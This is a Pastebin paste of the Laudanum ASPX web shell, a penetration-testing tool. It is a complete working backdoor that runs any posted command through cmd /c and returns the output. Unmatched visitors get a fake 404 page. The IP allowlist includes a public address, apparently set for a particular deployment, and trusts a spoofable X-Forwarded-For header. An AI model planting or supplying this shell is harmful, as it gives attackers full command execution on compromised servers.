API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 14th, 2018
99
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.30 KB | None | 0 0
raw download clone embed print report
  1. <%@ Page Language="C#"%>
  2. <%@ Import Namespace="System" %>
  3.  
  4. <script runat="server">
  5.  
  6. /* *****************************************************************************
  7. ***
  8. *** Laudanum Project
  9. *** A Collection of Injectable Files used during a Penetration Test
  10. ***
  11. *** More information is available at:
  12. *** http://laudanum.secureideas.net
  13. *** laudanum@secureideas.net
  14. ***
  15. *** Project Leads:
  16. *** Kevin Johnson <kjohnson@secureideas.net>
  17. *** Tim Medin <tim@counterhack.com>
  18. ***
  19. *** Copyright 2014 by Kevin Johnson and the Laudanum Team
  20. ***
  21. ********************************************************************************
  22. ***
  23. *** This file provides shell access to the system.
  24. ***
  25. ********************************************************************************
  26. *** This program is free software; you can redistribute it and/or
  27. *** modify it under the terms of the GNU General Public License
  28. *** as published by the Free Software Foundation; either version 2
  29. *** of the License, or (at your option) any later version.
  30. ***
  31. *** This program is distributed in the hope that it will be useful,
  32. *** but WITHOUT ANY WARRANTY; without even the implied warranty of
  33. *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  34. *** GNU General Public License for more details.
  35. ***
  36. *** You can get a copy of the GNU General Public License from this
  37. *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
  38. *** You can also write to the Free Software Foundation, Inc., 59 Temple
  39. *** Place - Suite 330, Boston, MA 02111-1307, USA.
  40. ***
  41. ***************************************************************************** */
  42.  
  43. string stdout = "";
  44. string stderr = "";
  45.  
  46. void die() {
  47. //HttpContext.Current.Response.Clear();
  48. HttpContext.Current.Response.StatusCode = 404;
  49. HttpContext.Current.Response.StatusDescription = "Not Found";
  50. HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
  51. HttpContext.Current.Server.ClearError();
  52. HttpContext.Current.Response.End();
  53. }
  54.  
  55. void Page_Load(object sender, System.EventArgs e) {
  56.  
  57. // Check for an IP in the range we want
  58. string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1", "5.79.113.48"};
  59.  
  60. // check if the X-Fordarded-For header exits
  61. string remoteIp;
  62. if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
  63. remoteIp = Request.UserHostAddress;
  64. } else {
  65. remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
  66. }
  67.  
  68. bool validIp = false;
  69. foreach (string ip in allowedIps) {
  70. validIp = (validIp || (remoteIp == ip));
  71. }
  72.  
  73. if (!validIp) {
  74. die();
  75. }
  76.  
  77. if (Request.Form["c"] != null) {
  78. // do or do not, there is no try
  79. //try {
  80. // create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
  81. // "/c" tells cmd that we want it to execute the command that follows, and exit.
  82. System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
  83.  
  84. // The following commands are needed to redirect the standard output and standard error.
  85. procStartInfo.RedirectStandardOutput = true;
  86. procStartInfo.RedirectStandardError = true;
  87. procStartInfo.UseShellExecute = false;
  88. // Do not create the black window.
  89. procStartInfo.CreateNoWindow = true;
  90. // Now we create a process, assign its ProcessStartInfo and start it
  91. System.Diagnostics.Process p = new System.Diagnostics.Process();
  92. p.StartInfo = procStartInfo;
  93. p.Start();
  94. // Get the output and error into a string
  95. stdout = p.StandardOutput.ReadToEnd();
  96. stderr = p.StandardError.ReadToEnd();
  97. //}
  98. //catch (Exception objException)
  99. //{
  100. }
  101. }
  102. </script>
  103. <html>
  104. <head><title>Laundanum ASPX Shell</title></head>
  105. <body onload="document.shell.c.focus()">
  106.  
  107. <form method="post" name="shell">
  108. cmd /c <input type="text" name="c"/>
  109. <input type="submit"><br/>
  110. STDOUT:<br/>
  111. <pre><% = stdout.Replace("<", "&lt;") %></pre>
  112. <br/>
  113. <br/>
  114. <br/>
  115. STDERR:<br/>
  116. <pre><% = stderr.Replace("<", "&lt;") %></pre>
  117.  
  118.  
  119. </form>
  120.  
  121. <hr/>
  122. <address>
  123. Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
  124. Written by Tim Medin.<br/>
  125. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
  126. </address>
  127.  
  128. </body>
  129. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!